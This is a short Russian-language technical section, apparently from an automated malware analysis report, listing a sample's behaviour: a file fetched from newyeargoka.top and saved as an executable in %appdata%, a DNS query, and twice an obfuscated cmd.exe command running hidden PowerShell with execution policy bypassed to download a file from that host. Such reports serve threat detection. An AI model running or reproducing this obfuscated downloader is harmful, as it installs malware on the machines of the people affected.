Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oW^erSH^e^Ll.^E^x^E ^-Exe^Cu^TI^on^Po^lIcy byPASs -^nOp^RoFIl^E^ -w^iNDow^S^TyLe hiD^D^E^N (New-^o^B^JEC^t ^sys^teM.NE^t^.^wEBclIeNT^).^D^ow^n^lOAD^Fi^L^e('http://newyeargoka.t...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^oW^erSH^e^Ll.^E^x^E ^-Exe^Cu^TI^on^Po^lIcy byPASs -^nOp^RoFIl^E^ -w^iNDow^S^TyLe hiD^D^E^N (New-^o^B^JEC^t ^sys^teM.NE^t^.^wEBclIeNT^).^D^ow^n^lOAD^Fi^L^e('http://newyeargoka.t...' (со скрытым окном)